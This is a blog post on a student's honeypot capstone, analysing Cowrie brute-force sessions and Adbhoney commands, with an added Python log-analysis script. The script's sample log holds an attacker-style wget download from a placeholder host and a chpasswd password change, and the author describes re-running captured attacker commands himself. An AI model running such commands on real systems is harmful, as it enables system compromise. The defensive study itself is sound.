Sweet Honey or a Cyber Trap?

An overview of my capstone project.

Noah Rodriguez
Nov 17, 2021

Oh, sweet honeypots… but what is a honeypot? In cybersecurity, a honeypot is a decoy system intended to lure attackers into thinking it is a real system with various vulnerabilities. Honeypots only appear vulnerable, which tricks attackers into attempting attacks against them. When the attacker strikes, the honeypot imitates a successful compromise while recording the activity, so the person monitoring it is left with detailed information about the attacks used against the honeypot.

For my capstone project, I was instructed to create my first honeypot and record the results in a report. In this report, I will be going over the information gathered from my honeypot.

The two main attacks that I will be analyzing are Cowrie attacks and Adbhoney attacks. Cowrie is a medium-to-high-interaction SSH and Telnet honeypot designed to log brute-force attacks and the shell interaction performed by the attacker. Adbhoney is a low-interaction honeypot designed for Android Debug Bridge over TCP/IP.

Cowrie Attacks

When taking a look into the Cowrie attacks dashboard, I noticed that 66% of these attacks were coming from China. I decided to single out the attacks coming from China to see if there was anything interesting about them. I noticed that one specific attacker downloaded a file named ‘dota.tar.gz’. Judging by the command-line input, this attacker was able to change the username and password. I was able to run the commands up until ‘cat /var/tmp/.var03522123 | head -n 1’, when the output revealed that ‘/var/tmp/.var03522123’ didn’t exist on my system.

Since Cowrie is built around brute-force attacks and shell interaction, many of these attacks used almost the same set of commands to change the password on the honeypot server so they can gain access.

The figure to the left shows the top usernames used in the brute-force attacks. The top three, ‘root’, ‘admin’, and ‘user’, are usually the main usernames attackers try when brute-forcing their way into someone’s system. Attackers try these first because many systems use these three usernames as login credentials, sometimes even as passwords as well, which is a poor choice precisely because they are the most common guesses in brute-force attacks.
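As an added example that is not part of the original post, the script below reproduces the kind of analysis described above directly from Cowrie's JSON log: it ranks the usernames seen in login attempts and flags sessions in which the attacker changed a password or downloaded a file. The sample log lines are constructed, and the field names (eventid, src_ip, session, username, input, url) are assumed to follow Cowrie's cowrie.json format.

```python
import json
from collections import Counter, defaultdict

# Constructed sample lines in the shape of Cowrie's cowrie.json output
# (eventid, src_ip, session, username/password, input, url). Not real data.
SAMPLE_LOG = """
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "session": "a1", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "session": "a1", "username": "admin", "password": "admin"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.5", "session": "a1", "username": "root", "password": "root"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "session": "a1", "input": "cd /tmp; wget http://example.invalid/dota.tar.gz"}
{"eventid": "cowrie.session.file_download", "src_ip": "203.0.113.5", "session": "a1", "url": "http://example.invalid/dota.tar.gz", "outfile": "dl/deadbeef"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "session": "a1", "input": "echo root:newpass | chpasswd"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.9", "session": "b2", "username": "user", "password": "user"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.9", "session": "b2", "username": "root", "password": "toor"}
{"eventid": "cowrie.command.input", "src_ip": "198.51.100.9", "session": "b3", "input": "uname -a"}
"""

# Commands that indicate the attacker tried to change an account password.
PASSWORD_CHANGE_MARKERS = ("passwd", "chpasswd")

def parse_events(text):
    """Yield one dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)

def summarize(text):
    """Return (username Counter, per-session dict of src_ip, password_change, downloads)."""
    usernames = Counter()
    sessions = defaultdict(lambda: {"src_ip": None, "password_change": False, "downloads": []})
    for ev in parse_events(text):
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            usernames[ev["username"]] += 1  # count every guess, successful or not
        sess = sessions[ev["session"]]
        sess["src_ip"] = ev.get("src_ip")
        if eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            if any(marker in cmd for marker in PASSWORD_CHANGE_MARKERS):
                sess["password_change"] = True
        elif eid == "cowrie.session.file_download":
            sess["downloads"].append(ev.get("url", ""))
    return usernames, dict(sessions)

def flagged_sessions(text):
    """Sessions worth a closer look: a password change or a file download was observed."""
    _, sessions = summarize(text)
    return {sid: s for sid, s in sessions.items() if s["password_change"] or s["downloads"]}
```

Calling summarize(SAMPLE_LOG) gives the top-username ranking behind a chart like the one above, and flagged_sessions(SAMPLE_LOG) isolates the sessions that behaved like the ‘dota.tar.gz’ attacker.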

Adbhoney Attacks

For the Adbhoney attacks, I focused on the specific IP sources that ran some commands. Three different IP sources under the same attacker ASN all ran the same commands, as shown below.

I decided to spin up my honeypot in my terminal and run the same exact commands to see what they would do.

Running this command, the same one run by these three IP sources, gave me the code for a webpage. In the code, there is a 404 ‘Not Found’ status code. This is an HTTP status code indicating that the server could not find the requested page: the web browser can connect to the server, but the specific page cannot be reached.

Debrief

Deploying a honeypot lets you see and understand the many attacks that happen daily, almost every second of the day, not just against honeypots but against real networks and computers within organizations. Most of these attacks are caught and dealt with, but there are always a couple of attacks that end up being successful. Successful attacks can be prevented by having a security plan in place and by finding and patching the vulnerabilities within your own network.
